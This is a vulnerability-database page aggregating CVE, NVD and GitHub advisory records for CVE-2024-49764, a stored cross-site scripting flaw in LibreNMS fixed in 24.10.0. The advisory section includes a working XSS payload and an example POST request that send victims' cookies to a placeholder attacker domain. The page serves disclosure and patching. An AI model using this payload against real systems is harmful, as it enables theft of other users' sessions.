cvelistv5 - cve-2024-49764

CVE-2024-49764 (GCVE-0-2024-49764)

Vulnerability from cvelistv5

Published

2024-11-15 15:27

Modified

2024-11-15 16:50

Severity ?

4.8 (Medium) - CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

CWE

CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Summary

LibreNMS is an open-source, PHP/MySQL/SNMP-based network monitoring system. A Stored Cross-Site Scripting (XSS) vulnerability in the "Capture Debug Information" page allows authenticated users to inject arbitrary JavaScript through the "hostname" parameter when creating a new device. This vulnerability results in the execution of malicious code when the "Capture Debug Information" page is visited, redirecting the user and sending non-httponly cookies to an attacker-controlled domain. This vulnerability is fixed in 24.10.0.

References

►

URL

Tags

	security-advisories@github.com	https://github.com/librenms/librenms/commit/af15eabbb1752985d36f337cecf137a947e170f6	Patch
	security-advisories@github.com	https://github.com/librenms/librenms/security/advisories/GHSA-rmr4-x6c9-jc68	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	librenms	librenms	Version: < 24.10.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:a:librenms:librenms:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "librenms",
            "vendor": "librenms",
            "versions": [
              {
                "lessThan": "24.10.0",
                "status": "affected",
                "version": "0",
                "versionType": "custom"
              }
            ]
          }
        ],
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-49764",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-11-15T16:47:58.784107Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-11-15T16:50:01.534Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "librenms",
          "vendor": "librenms",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 24.10.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "LibreNMS is an open-source, PHP/MySQL/SNMP-based network monitoring system. A Stored Cross-Site Scripting (XSS) vulnerability in the \"Capture Debug Information\" page allows authenticated users to inject arbitrary JavaScript through the \"hostname\" parameter when creating a new device. This vulnerability results in the execution of malicious code when the \"Capture Debug Information\" page is visited, redirecting the user and sending non-httponly cookies to an attacker-controlled domain. This vulnerability is fixed in 24.10.0."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 4.8,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "HIGH",
            "scope": "CHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-79",
              "description": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-11-15T15:27:52.199Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/librenms/librenms/security/advisories/GHSA-rmr4-x6c9-jc68",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/librenms/librenms/security/advisories/GHSA-rmr4-x6c9-jc68"
        },
        {
          "name": "https://github.com/librenms/librenms/commit/af15eabbb1752985d36f337cecf137a947e170f6",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/librenms/librenms/commit/af15eabbb1752985d36f337cecf137a947e170f6"
        }
      ],
      "source": {
        "advisory": "GHSA-rmr4-x6c9-jc68",
        "discovery": "UNKNOWN"
      },
      "title": "LibreNMS has a Stored XSS (\u0027Cross-site Scripting\u0027) in librenms/includes/html/pages/device/capture.inc.php"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2024-49764",
    "datePublished": "2024-11-15T15:27:52.199Z",
    "dateReserved": "2024-10-18T13:43:23.456Z",
    "dateUpdated": "2024-11-15T16:50:01.534Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2024-49764\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2024-11-15T16:15:35.323\",\"lastModified\":\"2024-11-20T14:40:02.630\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"LibreNMS is an open-source, PHP/MySQL/SNMP-based network monitoring system. A Stored Cross-Site Scripting (XSS) vulnerability in the \\\"Capture Debug Information\\\" page allows authenticated users to inject arbitrary JavaScript through the \\\"hostname\\\" parameter when creating a new device. This vulnerability results in the execution of malicious code when the \\\"Capture Debug Information\\\" page is visited, redirecting the user and sending non-httponly cookies to an attacker-controlled domain. This vulnerability is fixed in 24.10.0.\"},{\"lang\":\"es\",\"value\":\"LibreNMS es un sistema de monitoreo de red de c\u00f3digo abierto basado en PHP/MySQL/SNMP. Una vulnerabilidad de cross site scripting (XSS) almacenado en la p\u00e1gina \\\"Capturar informaci\u00f3n de depuraci\u00f3n\\\" permite a los usuarios autenticados inyectar c\u00f3digo JavaScript arbitrario a trav\u00e9s del par\u00e1metro \\\"nombre de host\\\" al crear un nuevo dispositivo. Esta vulnerabilidad da como resultado la ejecuci\u00f3n de c\u00f3digo malicioso cuando se visita la p\u00e1gina \\\"Capturar informaci\u00f3n de depuraci\u00f3n\\\", redirigiendo al usuario y enviando cookies que no son solo http a un dominio controlado por el atacante. Esta vulnerabilidad se corrigi\u00f3 en 24.10.0.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N\",\"baseScore\":4.8,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"HIGH\",\"userInteraction\":\"REQUIRED\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":1.7,\"impactScore\":2.7},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\",\"baseScore\":5.4,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"REQUIRED\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.3,\"impactScore\":2.7}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-79\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:librenms:librenms:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"24.10.0\",\"matchCriteriaId\":\"B4BD88D2-5DA7-450B-AEFA-33BCA61685A7\"}]}]}],\"references\":[{\"url\":\"https://github.com/librenms/librenms/commit/af15eabbb1752985d36f337cecf137a947e170f6\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/librenms/librenms/security/advisories/GHSA-rmr4-x6c9-jc68\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"cna\": {\"title\": \"LibreNMS has a Stored XSS (\u0027Cross-site Scripting\u0027) in librenms/includes/html/pages/device/capture.inc.php\", \"problemTypes\": [{\"descriptions\": [{\"cweId\": \"CWE-79\", \"lang\": \"en\", \"description\": \"CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)\", \"type\": \"CWE\"}]}], \"metrics\": [{\"cvssV3_1\": {\"attackComplexity\": \"LOW\", \"attackVector\": \"NETWORK\", \"availabilityImpact\": \"NONE\", \"baseScore\": 4.8, \"baseSeverity\": \"MEDIUM\", \"confidentialityImpact\": \"LOW\", \"integrityImpact\": \"LOW\", \"privilegesRequired\": \"HIGH\", \"scope\": \"CHANGED\", \"userInteraction\": \"REQUIRED\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N\", \"version\": \"3.1\"}}], \"references\": [{\"name\": \"https://github.com/librenms/librenms/security/advisories/GHSA-rmr4-x6c9-jc68\", \"tags\": [\"x_refsource_CONFIRM\"], \"url\": \"https://github.com/librenms/librenms/security/advisories/GHSA-rmr4-x6c9-jc68\"}, {\"name\": \"https://github.com/librenms/librenms/commit/af15eabbb1752985d36f337cecf137a947e170f6\", \"tags\": [\"x_refsource_MISC\"], \"url\": \"https://github.com/librenms/librenms/commit/af15eabbb1752985d36f337cecf137a947e170f6\"}], \"affected\": [{\"vendor\": \"librenms\", \"product\": \"librenms\", \"versions\": [{\"version\": \"\u003c 24.10.0\", \"status\": \"affected\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2024-11-15T15:27:52.199Z\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"LibreNMS is an open-source, PHP/MySQL/SNMP-based network monitoring system. A Stored Cross-Site Scripting (XSS) vulnerability in the \\\"Capture Debug Information\\\" page allows authenticated users to inject arbitrary JavaScript through the \\\"hostname\\\" parameter when creating a new device. This vulnerability results in the execution of malicious code when the \\\"Capture Debug Information\\\" page is visited, redirecting the user and sending non-httponly cookies to an attacker-controlled domain. This vulnerability is fixed in 24.10.0.\"}], \"source\": {\"advisory\": \"GHSA-rmr4-x6c9-jc68\", \"discovery\": \"UNKNOWN\"}}, \"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2024-49764\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-11-15T16:47:58.784107Z\"}}}], \"affected\": [{\"cpes\": [\"cpe:2.3:a:librenms:librenms:*:*:*:*:*:*:*:*\"], \"vendor\": \"librenms\", \"product\": \"librenms\", \"versions\": [{\"status\": \"affected\", \"version\": \"0\", \"lessThan\": \"24.10.0\", \"versionType\": \"custom\"}], \"defaultStatus\": \"unknown\"}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2024-11-15T16:48:43.202Z\"}}]}",
      "cveMetadata": "{\"cveId\": \"CVE-2024-49764\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"state\": \"PUBLISHED\", \"assignerShortName\": \"GitHub_M\", \"dateReserved\": \"2024-10-18T13:43:23.456Z\", \"datePublished\": \"2024-11-15T15:27:52.199Z\", \"dateUpdated\": \"2024-11-15T16:50:01.534Z\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

fkie_cve-2024-49764

Vulnerability from fkie_nvd

Published

2024-11-15 16:15

Modified

2024-11-20 14:40

Severity ?

4.8 (Medium) - CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
5.4 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Summary

References

▶	URL	Tags
	security-advisories@github.com	https://github.com/librenms/librenms/commit/af15eabbb1752985d36f337cecf137a947e170f6	Patch
	security-advisories@github.com	https://github.com/librenms/librenms/security/advisories/GHSA-rmr4-x6c9-jc68	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	librenms	librenms	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:librenms:librenms:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "B4BD88D2-5DA7-450B-AEFA-33BCA61685A7",
              "versionEndExcluding": "24.10.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "LibreNMS is an open-source, PHP/MySQL/SNMP-based network monitoring system. A Stored Cross-Site Scripting (XSS) vulnerability in the \"Capture Debug Information\" page allows authenticated users to inject arbitrary JavaScript through the \"hostname\" parameter when creating a new device. This vulnerability results in the execution of malicious code when the \"Capture Debug Information\" page is visited, redirecting the user and sending non-httponly cookies to an attacker-controlled domain. This vulnerability is fixed in 24.10.0."
    },
    {
      "lang": "es",
      "value": "LibreNMS es un sistema de monitoreo de red de c\u00f3digo abierto basado en PHP/MySQL/SNMP. Una vulnerabilidad de cross site scripting (XSS) almacenado en la p\u00e1gina \"Capturar informaci\u00f3n de depuraci\u00f3n\" permite a los usuarios autenticados inyectar c\u00f3digo JavaScript arbitrario a trav\u00e9s del par\u00e1metro \"nombre de host\" al crear un nuevo dispositivo. Esta vulnerabilidad da como resultado la ejecuci\u00f3n de c\u00f3digo malicioso cuando se visita la p\u00e1gina \"Capturar informaci\u00f3n de depuraci\u00f3n\", redirigiendo al usuario y enviando cookies que no son solo http a un dominio controlado por el atacante. Esta vulnerabilidad se corrigi\u00f3 en 24.10.0."
    }
  ],
  "id": "CVE-2024-49764",
  "lastModified": "2024-11-20T14:40:02.630",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 4.8,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "LOW",
          "privilegesRequired": "HIGH",
          "scope": "CHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 1.7,
        "impactScore": 2.7,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 5.4,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "LOW",
          "privilegesRequired": "LOW",
          "scope": "CHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.3,
        "impactScore": 2.7,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2024-11-15T16:15:35.323",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/librenms/librenms/commit/af15eabbb1752985d36f337cecf137a947e170f6"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/librenms/librenms/security/advisories/GHSA-rmr4-x6c9-jc68"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-79"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

ghsa-rmr4-x6c9-jc68

Vulnerability from github

Published

2024-11-15 15:27

Modified

2024-11-15 20:49

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L

Summary

LibreNMS has a Stored XSS ('Cross-site Scripting') in librenms/includes/html/pages/device/capture.inc.php

Details

Summary

A Stored Cross-Site Scripting (XSS) vulnerability in the "Capture Debug Information" page allows authenticated users to inject arbitrary JavaScript through the "hostname" parameter when creating a new device. This vulnerability results in the execution of malicious code when the "Capture Debug Information" page is visited, redirecting the user and sending non-httponly cookies to an attacker-controlled domain.

Details

When creating a new device, an attacker can inject the following XSS payload into the "hostname" parameter:

test'" autofocus onfocus="document.location='https://<attacker_domain>/logger.php?c='+document.cookie"

(Note: You may need to URL-encode the '+' sign in the payload.)

The payload triggers automatically when visiting the "Capture Debug Information" page for the device, redirecting the user's browser to the attacker-controlled domain along with any non-httponly cookies.

The vulnerability is due to insufficient sanitization of the "url" variable before it is output in the HTML. This is evident in the following lines of code:

https://github.com/librenms/librenms/blob/7f2ae971c4a565b0d7345fa78b4211409f96800a/includes/html/pages/device/capture.inc.php#L55

PoC

Create a new device with the following payload in the "hostname" parameter: test'" autofocus onfocus="document.location='https://<attacker_domain>/logger.php?c='+document.cookie"
Save the device.
Navigate to the "Capture Debug Information" page for the device.
Observe that the injected script triggers and redirects the user to the attacker's domain, sending cookies.

Example Request: ```http POST /addhost HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded Cookie:

_token=&hostname=test%27%22+autofocus+onfocus%3D%22document.location%3D%27https%3A%2F%2F%2Flogger.php%3Fc%3D%27%2bdocument.cookie%22&snmp=on&sysName=&hardware=&os=&os_id=&snmpver=v2c&port=&transport=udp&port_assoc_mode=ifIndex&community=&authlevel=noAuthNoPriv&authname=&authpass=&authalgo=SHA&cryptopass=&cryptoalgo=AES&force_add=on&Submit= ```

Impact

This vulnerability allows authenticated users to execute arbitrary JavaScript in the context of other users' sessions when they visit the "Capture Debug Information" page of the device. The attacker can redirect the user to a malicious domain and capture non-httponly cookies, potentially compromising the user's account and allowing unauthorized actions.

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 24.9.1"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "librenms/librenms"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "24.10.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-49764"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-11-15T15:27:42Z",
    "nvd_published_at": "2024-11-15T16:15:35Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nA Stored Cross-Site Scripting (XSS) vulnerability in the \"Capture Debug Information\" page allows authenticated users to inject arbitrary JavaScript through the \"hostname\" parameter when creating a new device. This vulnerability results in the execution of malicious code when the \"Capture Debug Information\" page is visited, redirecting the user and sending non-httponly cookies to an attacker-controlled domain.\n\n### Details\nWhen creating a new device, an attacker can inject the following XSS payload into the \"hostname\" parameter:\n\n```\ntest\u0027\" autofocus onfocus=\"document.location=\u0027https://\u003cattacker_domain\u003e/logger.php?c=\u0027+document.cookie\"\n```\n\n(Note: You may need to URL-encode the \u0027+\u0027 sign in the payload.)\n\nThe payload triggers automatically when visiting the \"Capture Debug Information\" page for the device, redirecting the user\u0027s browser to the attacker-controlled domain along with any non-httponly cookies.\n\nThe vulnerability is due to insufficient sanitization of the \"url\" variable before it is output in the HTML. This is evident in the following lines of code:\n\nhttps://github.com/librenms/librenms/blob/7f2ae971c4a565b0d7345fa78b4211409f96800a/includes/html/pages/device/capture.inc.php#L55\n\n### PoC\n1. Create a new device with the following payload in the \"hostname\" parameter:\n```\ntest\u0027\" autofocus onfocus=\"document.location=\u0027https://\u003cattacker_domain\u003e/logger.php?c=\u0027+document.cookie\"\n```\n2. Save the device.\n3. Navigate to the \"Capture Debug Information\" page for the device.\n4. Observe that the injected script triggers and redirects the user to the attacker\u0027s domain, sending cookies.\n\nExample Request:\n```http\nPOST /addhost HTTP/1.1\nHost: \u003cyour_host\u003e\nContent-Type: application/x-www-form-urlencoded\nCookie: \u003cyour_cookie\u003e\n\n_token=\u003cyour_token\u003e\u0026hostname=test%27%22+autofocus+onfocus%3D%22document.location%3D%27https%3A%2F%2F\u003cattacker_domain\u003e%2Flogger.php%3Fc%3D%27%2bdocument.cookie%22\u0026snmp=on\u0026sysName=\u0026hardware=\u0026os=\u0026os_id=\u0026snmpver=v2c\u0026port=\u0026transport=udp\u0026port_assoc_mode=ifIndex\u0026community=\u0026authlevel=noAuthNoPriv\u0026authname=\u0026authpass=\u0026authalgo=SHA\u0026cryptopass=\u0026cryptoalgo=AES\u0026force_add=on\u0026Submit=\n```\n\n### Impact\n\nThis vulnerability allows authenticated users to execute arbitrary JavaScript in the context of other users\u0027 sessions when they visit the \"Capture Debug Information\" page of the device. The attacker can redirect the user to a malicious domain and capture non-httponly cookies, potentially compromising the user\u0027s account and allowing unauthorized actions.",
  "id": "GHSA-rmr4-x6c9-jc68",
  "modified": "2024-11-15T20:49:49Z",
  "published": "2024-11-15T15:27:42Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/librenms/librenms/security/advisories/GHSA-rmr4-x6c9-jc68"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-49764"
    },
    {
      "type": "WEB",
      "url": "https://github.com/librenms/librenms/commit/af15eabbb1752985d36f337cecf137a947e170f6"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/librenms/librenms"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "LibreNMS has a Stored XSS (\u0027Cross-site Scripting\u0027) in librenms/includes/html/pages/device/capture.inc.php"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

CVE-2024-49764 (GCVE-0-2024-49764)

Vulnerability from cvelistv5

fkie_cve-2024-49764

Vulnerability from fkie_nvd

ghsa-rmr4-x6c9-jc68

Vulnerability from github

Summary

Details

PoC

Impact

Tags

Sightings

Nomenclature